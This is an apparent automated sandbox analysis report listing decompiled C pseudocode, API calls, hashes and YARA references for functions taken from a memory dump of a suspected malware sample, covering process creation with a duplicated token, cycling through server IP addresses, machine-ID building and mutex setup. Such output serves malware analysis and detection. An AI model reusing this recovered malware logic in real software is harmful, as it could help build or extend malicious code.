0x00e51d76
0x00e51d79
0x00e51d7f
0x00e51d85
0x00e51d90
0x00e51d97
0x00000000

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 507b5e8bd49c62335b324b7a7aa34f7aac77377535aefcb507b954122acb39c1
Instruction ID: 5d16767ef64922fbfdb1f8cc7621f73be76d11a1bd1be0f16fe06c2ee19bd681
Opcode Fuzzy Hash: 507b5e8bd49c62335b324b7a7aa34f7aac77377535aefcb507b954122acb39c1
Instruction Fuzzy Hash: C631C4366082009FD304EF65FC8596B77E9EB543A2B141E6AF911F72E1DEA09C0C8752

Uniqueness

Uniqueness Score: -1.00%

Function 00E51B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00E51B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0xe6e6f4; // 0x0
				_t12 = E00E5A4A5(_t38, 0);
				while(_t12 < 0) {
					E00E597F2( &_v28);
					_t40 =  *0xe6e700; // 0x0
					_t14 =  *0xe6e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0xe6e684; // 0x510f6c8
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0xe6e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0xe6e684; // 0x510f6c8
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0xe6e6f4; // 0x0
								__eflags = 0;
								_t12 = E00E5A4A5(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E00E597F2(0xe6e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0xe6e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0xe6e6e8; // 0x0
				_v28 = _t24;
				_t61 = E00E51A1B( &_v28, E00E5131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0xe6e760);
					_t48 = 0x27;
					E00E59EEC(_t48);
				}
				if(_v24 != 0) {
					E00E56876( &_v24);
				}
				_t26 =  *0xe6e684; // 0x510f6c8
				 *((intOrPtr*)(_t26 + 0x30))( *0xe6e6ec);
				_t28 =  *0xe6e758; // 0x0
				 *0xe6e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0xe6e6f4; // 0x0
				 *0xe6e758 =  !=  ? 1 : _t28;
				E00E5A4C1(_t46);
				_t15 = _t61;
				goto L12;
			}

0x00e51b2d
0x00e51b33
0x00e51b41
0x00e51baf
0x00e51b4e
0x00e51b53
0x00e51b59
0x00e51b5e
0x00e51b64
0x00e51b66
0x00e51b6a
0x00e51c64
0x00e51c64
0x00e51b70
0x00e51b70
0x00e51b7c
0x00e51b7c
0x00e51b88
0x00e51b8e
0x00e51b90
0x00000000
0x00e51b92
0x00e51b92
0x00e51b9c
0x00e51ba2
0x00e51ba8
0x00e51baa
0x00000000
0x00e51baa
0x00e51b72
0x00e51b72
0x00e51b76
0x00000000
0x00000000
0x00000000
0x00000000
0x00e51b76
0x00e51b70
0x00e51c5d
0x00e51c63
0x00e51c63
0x00e51bb8
0x00e51bcc
0x00e51bcf
0x00e51bd9
0x00e51be5
0x00e51bef
0x00e51bf0
0x00e51bf1
0x00e51bf2
0x00e51bf7
0x00e51c00
0x00e51c04
0x00e51c06
0x00e51c07
0x00e51c0f
0x00e51c10
0x00e51c16
0x00e51c1b
0x00e51c21
0x00e51c21
0x00e51c26
0x00e51c31
0x00e51c34
0x00e51c3c
0x00e51c48
0x00e51c4b
0x00e51c51
0x00e51c56
0x00e51c5b
0x00000000

APIs

GetCurrentProcess.KERNEL32(00E6E6EC,00000000,00000000,00000002), ref: 00E51BCC
GetCurrentThread.KERNEL32 ref: 00E51BCF
GetCurrentProcess.KERNEL32(00000000), ref: 00E51BD6
DuplicateHandle.KERNEL32(00000000), ref: 00E51BD9

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: c7d5bd4ea6af882d7fd1cdeaf13606858437f20bbad9184e4510c4cd738a0895
Instruction ID: c8acb7a8f4c48a2ff401bb5dd21e9cf0012c8bf787ec633b3c4b137cfbea5bd9
Opcode Fuzzy Hash: c7d5bd4ea6af882d7fd1cdeaf13606858437f20bbad9184e4510c4cd738a0895
Instruction Fuzzy Hash: 3D31A3796043119FD308DF66FD85A2B77E9EB54391B002D69F912B72E2DAB09C0CCB52

Uniqueness

Uniqueness Score: -1.00%

Function 00E5AD2A, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00E5AD2A(intOrPtr* __ecx, void* __edx, char _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v32;
				char* _v92;
				void _v100;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr* _t25;
				int _t27;
				intOrPtr _t28;
				intOrPtr _t38;
				intOrPtr _t47;
				int _t58;
				int _t60;

				_t21 =  *0xe6e680; // 0x0
				_t22 =  *_t21;
				_t60 = 0;
				if(_t22 != 0) {
					_t1 =  &_v12; // 0xe54973
					_push( *__ecx);
					if( *_t22() != 0) {
						_v8 = 0;
						_t25 = E00E5B97E(1,  &_v8);
						_v16 = _t25;
						if(_t25 != 0) {
							_push(__edx);
							_push( *_t25);
							_t28 =  *0xe6e68c; // 0x510f890
							if( *((intOrPtr*)(_t28 + 0x68))() != 0) {
								_v8 = 0;
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t58 = 0x44;
								memset( &_v100, 0, _t58);
								_v100 = _t58;
								_v92 =  &_v8;
								_push( &_v32);
								_push( &_v100);
								_t38 =  *0xe6e684; // 0x510f6c8
								_push(0);
								_push(0);
								_push(0x4000000);
								_push(0);
								_push(0);
								_push(0);
								_t15 =  &_a4; // 0xe54973
								_push( *_t15);
								_push(0);
								_push(_v12);
								if( *((intOrPtr*)(_t38 + 0x50))() != 0) {
									_t60 = 1;
								}
							}
							E00E58600( &_v16, 0);
						}
						_t47 =  *0xe6e684; // 0x510f6c8
						_t19 =  &_v12; // 0xe54973
						 *((intOrPtr*)(_t47 + 0x30))( *_t19);
						_t27 = _t60;
						L10:
						return _t27;
					}
					GetLastError();
				}
				_t27 = 0;
				goto L10;
			}

0x00e5ad2d
0x00e5ad35
0x00e5ad3b
0x00e5ad42
0x00e5ad4b
0x00e5ad4f
0x00e5ad55
0x00e5ad67
0x00e5ad6c
0x00e5ad71
0x00e5ad77
0x00e5ad79
0x00e5ad7a
0x00e5ad7c
0x00e5ad86
0x00e5ad8d
0x00e5ad91
0x00e5ad94
0x00e5ad95
0x00e5ad96
0x00e5ad9a
0x00e5ad9e
0x00e5ada6
0x00e5adac
0x00e5adb2
0x00e5adb6
0x00e5adb7
0x00e5adbc
0x00e5adbd
0x00e5adbe
0x00e5adc3
0x00e5adc4
0x00e5adc5
0x00e5adc6
0x00e5adc6
0x00e5adc9
0x00e5adca
0x00e5add2
0x00e5add6
0x00e5add6
0x00e5add2
0x00e5addc
0x00e5ade2
0x00e5ade3
0x00e5ade9
0x00e5adec
0x00e5adef
0x00e5adf1
0x00e5adf5
0x00e5adf5
0x00e5ad57
0x00e5ad57
0x00e5ad44
0x00000000

APIs

GetLastError.KERNEL32 ref: 00E5AD57

Part of subcall function 00E5B97E: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,00E5BA1D,?,00000000,?,00E5D0B3), ref: 00E5B999
Part of subcall function 00E5B97E: GetLastError.KERNEL32(?,00E5BA1D,?,00000000,?,00E5D0B3), ref: 00E5B9A0

memset.MSVCRT ref: 00E5AD9E

Strings

sI, xrefs: 00E5AD4B, 00E5AD5F, 00E5ADE9, 00E5AD4E
sI, xrefs: 00E5ADC6

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: ErrorLast$InformationTokenmemset
String ID: sI$sI
API String ID: 898169725-1970482550
Opcode ID: e10b12529985e756423a3371950996be21a73201d9575a8c8a04aa5c680d843e
Instruction ID: 201a40351f5d2388a34c77e9d0aecd90c3cfb03c550a18239fda911d645f3aa0
Opcode Fuzzy Hash: e10b12529985e756423a3371950996be21a73201d9575a8c8a04aa5c680d843e
Instruction Fuzzy Hash: EE216076A0010CBFEB009BA9DC84DAFB7BDEB88399B144579F901E7120E7709D099B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E5B78E, Relevance: 6.1, APIs: 4, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E5B78E(WCHAR* __ecx, void* __edx) {
				signed int _v8;
				long _v12;
				char _v16;
				short _v528;
				char _v1040;
				char _v1552;
				intOrPtr _t23;
				char _t27;
				intOrPtr _t28;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0xe6e684; // 0x510f6c8
				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E00E595C7(_t44, 0xa88);
				_v16 = _t27;
				_t28 =  *0xe6e684; // 0x510f6c8
				_t29 =  *((intOrPtr*)(_t28 + 0x68))(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E00E585BB( &_v16);
				_t33 = E00E5C39D(_t43);
				E00E59626( &(_t43[E00E5C39D(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E00E5C39D(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E00E5D40B(_t43, E00E5C39D(_t43) + _t40, 0);
			}

0x00e5b78e
0x00e5b797
0x00e5b7a3
0x00e5b7a9
0x00e5b7ab
0x00e5b7b3
0x00e5b7c1
0x00e5b7c6
0x00e5b7d5
0x00e5b7e0
0x00e5b7ed
0x00e5b802
0x00e5b807
0x00e5b80c
0x00e5b80e
0x00e5b815
0x00e5b825
0x00e5b836
0x00e5b840
0x00e5b848
0x00e5b84f
0x00e5b852
0x00e5b86f

APIs

memset.MSVCRT ref: 00E5B7AB
lstrcpynW.KERNEL32(?,?,00000100), ref: 00E5B7D5

Part of subcall function 00E59626: _vsnwprintf.MSVCRT ref: 00E59643

lstrcatW.KERNEL32(?,00000114), ref: 00E5B840
CharUpperBuffW.USER32(?,00000000), ref: 00E5B852

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: BuffCharUpper_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 1024327890-0
Opcode ID: 5463413ca12b3cc4075b7a82a849a8d2506ebb279e2394e1d4917d78f6cce76b
Instruction ID: 9fe66a403cc598cdb09e09f31a798ed88d92c5860ca64b086ad2c6bff082dfae
Opcode Fuzzy Hash: 5463413ca12b3cc4075b7a82a849a8d2506ebb279e2394e1d4917d78f6cce76b
Instruction Fuzzy Hash: 4E2174B2940218BFE700ABB5DC4AFEF77ACDB44351F1045A5F905F6182EAB45E4C8B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E56F4D, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 43
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E56F4D(void* __ecx, void* __edx, char _a4) {
				CHAR* _v12;
				char _v32;
				char _v272;
				void _v288;
				void* _t16;
				CHAR* _t30;
				void* _t31;

				E00E586C7( &_v288, __ecx, 0x10);
				_t30 = E00E51080(0x357);
				_v12 = _t30;
				lstrcpynA( &_v272, _t30, 0xf0);
				_t16 = E00E5C384(_t30);
				_t4 =  &_v12; // 0xe57023
				_t31 = _t16;
				E00E585A8(_t4);
				_t6 = _t31 + 0x10; // 0x10
				E00E5F49B( &_v288, _t6,  &_v32);
				memset( &_v288, 0, 0x100);
				_t9 =  &_a4; // 0xe57023
				return E00E5EACC( &_v288,  &_v32, 0x14,  *_t9);
			}

0x00e56f61
0x00e56f73
0x00e56f82
0x00e56f85
0x00e56f8c
0x00e56f91
0x00e56f94
0x00e56f96
0x00e56f9f
0x00e56fa8
0x00e56fbb
0x00e56fc0
0x00e56fd3

APIs

lstrcpynA.KERNEL32(?,00000000,000000F0,?,?,00000000), ref: 00E56F85
memset.MSVCRT ref: 00E56FBB

Strings

#p, xrefs: 00E56F91
#p, xrefs: 00E56FC0

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: lstrcpynmemset
String ID: #p$#p
API String ID: 1726730300-739975488
Opcode ID: 25bad843a91e0e360c6746e2ede2e03b6ecdbcf558429a96027a2ec890e6669d
Instruction ID: 33eab0eabf4ecf957d2a7c531de092da597830cc04e386b4385b07427aa781dc
Opcode Fuzzy Hash: 25bad843a91e0e360c6746e2ede2e03b6ecdbcf558429a96027a2ec890e6669d
Instruction Fuzzy Hash: 81016D72C4021DBADB25EBA0DC47FCE77AC9F08341F0059A1FA05B6181EAB4A74D8BD4

Uniqueness

Uniqueness Score: -1.00%

Function 00E51A1B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00E51A1B(intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				CHAR* _v20;
				char _v36;
				signed short _t22;
				CHAR* _t23;
				CHAR* _t24;
				CHAR* _t32;
				intOrPtr _t37;
				CHAR* _t38;
				CHAR* _t39;
				intOrPtr _t40;
				intOrPtr _t54;
				char* _t57;
				signed int _t60;
				signed int _t61;
				CHAR* _t62;
				signed int _t64;
				CHAR* _t66;
				void* _t74;

				_t74 = __fp0;
				_t40 = __ecx;
				_t37 = __edx;
				_v12 = __ecx;
				_t57 =  *0xe6e6f0; // 0x0
				_push(_t60);
				_t61 = _t60 | 0xffffffff;
				_v16 = __edx;
				_t66 = _t61;
				if( *_t57 != 0) {
					L6:
					_t22 =  *0xe6e6fc; // 0x0
					_t72 = _t22;
					if(_t22 == 0) {
						goto L9;
					} else {
						_t24 = E00E5160D(_t37, _t57, _t72, _t22 & 0x0000ffff, _t40);
						_t66 = _t24;
						if(_t66 < 0) {
							goto L9;
						} else {
						}
					}
				} else {
					_push(0x2d);
					_t39 = E00E59E8B();
					_v20 = _t39;
					_t32 = E00E59E4C(0x2e);
					_v8 = _t32;
					if(_t39 != 0 && _t32 != _t61) {
						_t54 =  *0xe6e6f0; // 0x0
						E00E596B0(_t54, _t39, 0x100);
						 *0xe6e6fc = _v8;
					}
					E00E58600( &_v20, _t61);
					_t57 =  *0xe6e6f0; // 0x0
					if( *_t57 == 0) {
						L9:
						_t38 = 0;
						_v8 = 0;
						_t23 = E00E51778( &_v8, _t74);
						_v20 = _t23;
						__eflags = _t23;
						if(_t23 != 0) {
							__eflags = _v8;
							if(_v8 > 0) {
								_t13 =  &(_t23[4]); // 0x4
								_t64 = _t13;
								while(1) {
									__eflags =  *_t64;
									if(__eflags != 0) {
										__imp__#12(0x10);
										lstrcpynA( &_v36, _t23,  *_t64);
										_t23 = E00E5160D(_v16,  &_v36, __eflags,  *(_t64 + 4) & 0x0000ffff, _v12);
										_t66 = _t23;
									}
									__eflags = _t66;
									if(_t66 >= 0) {
										break;
									}
									_t38 = _t38 + 1;
									_t64 = _t64 + 0x20;
									__eflags = _t38 - _v8;
									if(_t38 < _v8) {
										continue;
									}
									break;
								}
								_t61 = _t64 | 0xffffffff;
								__eflags = _t61;
							}
							E00E58600( &_v20, _v8);
						}
						__eflags = _t66;
						_t62 =  >=  ? _t66 : _t61;
						__eflags = _t62;
						_t24 = _t62;
					} else {
						_t37 = _v16;
						_t40 = _v12;
						goto L6;
					}
				}
				return _t24;
			}

0x00e51a1b
0x00e51a1b
0x00e51a22
0x00e51a24
0x00e51a27
0x00e51a2e
0x00e51a2f
0x00e51a32
0x00e51a38
0x00e51a3a
0x00e51a95
0x00e51a95
0x00e51a9b
0x00e51a9e
0x00000000
0x00e51aa0
0x00e51aa7
0x00e51aac
0x00e51ab2
0x00000000
0x00000000
0x00e51ab4
0x00e51ab2
0x00e51a3c
0x00e51a3c
0x00e51a44
0x00e51a48
0x00e51a4b
0x00e51a50
0x00e51a56
0x00e51a5c
0x00e51a69
0x00e51a72
0x00e51a72
0x00e51a7d
0x00e51a82
0x00e51a8d
0x00e51ab6
0x00e51ab6
0x00e51abb
0x00e51abe
0x00e51ac3
0x00e51ac6
0x00e51ac8
0x00e51aca
0x00e51acd
0x00e51acf
0x00e51acf
0x00e51ad2
0x00e51ad2
0x00e51ad5
0x00e51adb
0x00e51ae6
0x00e51afa
0x00e51b01
0x00e51b01
0x00e51b03
0x00e51b05
0x00000000
0x00000000
0x00e51b07
0x00e51b08
0x00e51b0b
0x00e51b0e
0x00000000
0x00000000
0x00000000
0x00e51b0e
0x00e51b10
0x00e51b10
0x00e51b10
0x00e51b1a
0x00e51b20
0x00e51b21
0x00e51b23
0x00e51b23
0x00e51b26
0x00e51a8f
0x00e51a8f
0x00e51a92
0x00000000
0x00e51a92
0x00e51a8d
0x00e51b2c

APIs

inet_ntoa.WS2_32(00000004), ref: 00E51ADB
lstrcpynA.KERNEL32(?,00000000), ref: 00E51AE6

Part of subcall function 00E596B0: memset.MSVCRT ref: 00E596D9

Strings

@}s, xrefs: 00E51ADB

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: inet_ntoalstrcpynmemset
String ID: @}s
API String ID: 129148211-1738643329
Opcode ID: ec4a078b2f82515253cdddfc6ac890b43c0468c67a16a24a9a3598666112ea25
Instruction ID: 9d673ea6f8683594cd43599b40e8f45f6af313ffc4004691b801e4e5b38d6bc5
Opcode Fuzzy Hash: ec4a078b2f82515253cdddfc6ac890b43c0468c67a16a24a9a3598666112ea25
Instruction Fuzzy Hash: 92312835E00316EFDB15DFA5D880AAE77B5EB44351F141A9AE910B72C1EB709D48CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E52AEA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00E52AEA() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0xe6e710 * 0x64;
				_t39 = 0;
				_v12 =  *0xe6e710 * 0x64;
				_t16 = E00E585EA(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0xe6e710; // 0x0
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E00E59F2E(0xe);
						E00E58600( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0xe6e714; // 0x0
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0xe6e714; // 0x0
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E00E595E7( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0xe6e710; // 0x0
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}

0x00e52af0
0x00e52afa
0x00e52afd
0x00e52b00
0x00e52b05
0x00e52b07
0x00e52b0d
0x00e52b17
0x00e52b1d
0x00e52b1f
0x00e52b24
0x00e52b81
0x00e52b87
0x00e52b8b
0x00e52b96
0x00000000
0x00e52b9d
0x00e52b26
0x00e52b28
0x00e52b28
0x00e52b31
0x00e52b35
0x00e52b3d
0x00e52b43
0x00e52b43
0x00e52b44
0x00e52b49
0x00e52b4d
0x00e52b63
0x00e52b68
0x00e52b6e
0x00e52b71
0x00e52b74
0x00e52b74
0x00e52b76
0x00e52b77
0x00e52b7a
0x00e52b7d
0x00000000
0x00e52b28
0x00000000

APIs

Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8

lstrcatA.KERNEL32(00000000,00E6B998,&W,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,00E55726), ref: 00E52B3D

Strings

%u;%u;%u, xrefs: 00E52B59
&W, xrefs: 00E52AF9

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: AllocateHeaplstrcat
String ID: %u;%u;%u$&W
API String ID: 3011335133-3997225555
Opcode ID: 18cfe028cec2a502f122d4457730665e0c4ebcb1f49782d06084cb3302d6d9ce
Instruction ID: c085a08195d7e5eda895ae86ba77ca63e357ae050d80fbe1144407b4ba4d15d1
Opcode Fuzzy Hash: 18cfe028cec2a502f122d4457730665e0c4ebcb1f49782d06084cb3302d6d9ce
Instruction Fuzzy Hash: 0E113636A00300EFCB15DFAAECC4D9B7BB9EB85365B145D2AE900F7291DB709808CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E5153B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00E5153B(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t5;
				intOrPtr _t7;
				signed int _t9;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0xe6e6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0xe6e6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E00E51080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							_t5 = E00E5918C(_t3, 0);
							_t2 =  &_v8; // 0xe556ef
							 *0xe6e6e8 = _t5;
							E00E585A8(_t2);
							_t7 = E00E585EA(0x100);
							 *0xe6e6f0 = _t7;
							if(_t7 != 0) {
								 *0xe6e6fc = 0;
								_t9 = E00E585EA(0x401);
								 *0xe6e6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0xe6e6c0; // 0x0
									if(__eflags == 0) {
										E00E615C1(E00E581E8, E00E581F1);
									}
									_push(0x61e);
									_t24 = 8;
									 *0xe6e6a0 = E00E5E1C7(0xe6bd14, _t24);
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}

0x00e5153e
0x00e51545
0x00e5154b
0x00e51552
0x00e51607
0x00e51607
0x00e51607
0x00e51558
0x00e5155b
0x00e51561
0x00e51568
0x00000000
0x00e5156e
0x00e51573
0x00e51578
0x00e5157d
0x00000000
0x00e51583
0x00e51587
0x00e5158c
0x00e5158f
0x00e51594
0x00e5159e
0x00e515a3
0x00e515ab
0x00e515b9
0x00e515bf
0x00e515c4
0x00e515ca
0x00e515cc
0x00e515d2
0x00e515d8
0x00e515e4
0x00e515ea
0x00e515eb
0x00e515f2
0x00e515fd
0x00e51602
0x00e515ce
0x00e515ce
0x00000000
0x00e515ce
0x00e515ad
0x00e515ad
0x00e515af
0x00e515af
0x00e515af
0x00e515ab
0x00e5157d
0x00e51568
0x00e5160c

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00E556EF), ref: 00E51545
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00E556EF), ref: 00E5155B

Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8

Strings

V, xrefs: 00E5158C

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: CreateMutex$AllocateHeap
String ID: V
API String ID: 704353917-4045069856
Opcode ID: 5d45f91a9cad80c00a70298bfea3ae09e773842f9bed0c5616c8730ac9f20fbb
Instruction ID: 1d5c41783fd32ed956309b7da9e00d581523431bcd2a0477e113eaaba1aac1f9
Opcode Fuzzy Hash: 5d45f91a9cad80c00a70298bfea3ae09e773842f9bed0c5616c8730ac9f20fbb
Instruction Fuzzy Hash: 8311D374605602AEE7149B77FD16A2B36E49BE17E77102E6DEC12F52D0FEF0840C8611

Uniqueness

Uniqueness Score: -1.00%

Function 00E5B197, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00E5B197(WCHAR* __ecx, void* __edx, void* __eflags, void* __fp0) {
				char _v8;
				char _v72;
				void _v584;
				intOrPtr _t13;
				intOrPtr _t15;
				char _t21;
				intOrPtr _t23;
				WCHAR* _t35;

				_t28 = __ecx;
				_t35 = __ecx;
				SetFileAttributesW(__ecx, 0x80);
				memset( &_v584, 0, 0x200);
				E00E5A763(_t35,  &_v584, 0x200);
				_t13 =  *0xe6e684; // 0x510f6c8
				_push(_t35);
				if( *((intOrPtr*)(_t13 + 0x10c))() == 0) {
					_t15 =  *0xe6e688; // 0xe80000
					E00E59626( &_v72, 0x20, L"%d", E00E62438(_t28, __eflags, __fp0, _t15 + 0x648, 0xf0000000, 0xffffffff));
					_push(0);
					_push( &_v72);
					_push(".");
					_t21 = E00E592CB(_t35);
					_v8 = _t21;
					__eflags = _t21;
					if(_t21 == 0) {
						L4:
						__eflags = 0;
						return 0;
					}
					_t23 = E00E5B0C4(_t35, _t21, __fp0);
					_t7 =  &_v8; // 0xe56309
					E00E58600(_t7, 0xfffffffe);
					__eflags = _t23;
					if(_t23 >= 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				return 1;
			}

0x00e5b197
0x00e5b1a2
0x00e5b1aa
0x00e5b1bf
0x00e5b1cd
0x00e5b1d2
0x00e5b1da
0x00e5b1e3
0x00e5b1ea
0x00e5b20d
0x00e5b212
0x00e5b217
0x00e5b218
0x00e5b21e
0x00e5b226
0x00e5b229
0x00e5b22b
0x00e5b249
0x00e5b249
0x00000000
0x00e5b249
0x00e5b231
0x00e5b238
0x00e5b23e
0x00e5b245
0x00e5b247
0x00000000
0x00000000
0x00000000
0x00e5b247
0x00e5b1e5
0x00000000

APIs

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000), ref: 00E5B1AA
memset.MSVCRT ref: 00E5B1BF

Strings

c, xrefs: 00E5B238, 00E5B23D

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: AttributesFilememset
String ID: c
API String ID: 2040103695-2526160730
Opcode ID: f611ac080795549748e26ed4d42de4ee086e8eef651f0b89c43068a4084ef8c0
Instruction ID: cbd7e04221ac096165bdf3b389700802ba547ed0b434ca19a3b7c1dd3c0dccc0
Opcode Fuzzy Hash: f611ac080795549748e26ed4d42de4ee086e8eef651f0b89c43068a4084ef8c0
Instruction Fuzzy Hash: 6C110632A40214BADB10A765ED0AFDF32ECDF15751F101921F900F71C1EBA0DA0986B5

Uniqueness

Uniqueness Score: -1.00%

Function 00E5825F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00E5825F() {
				short* _v8;
				char* _v12;
				short* _t8;
				int _t20;
				short* _t22;
				char* _t27;
				int _t30;

				_push(_t22);
				_push(_t22);
				_t8 = _t22;
				_t30 = 0;
				_v8 = _t8;
				if(_t8 != 0) {
					_t20 = WideCharToMultiByte(0xfde9, 0, _t8, 0xffffffff, 0, 0, 0, 0);
					if(_t20 > 0) {
						_t2 = _t20 + 1; // 0x1
						_t27 = E00E585EA(_t2);
						_v12 = _t27;
						if(_t27 != 0) {
							if(WideCharToMultiByte(0xfde9, 0, _v8, 0xffffffff, _t27, _t20, 0, 0) > 0) {
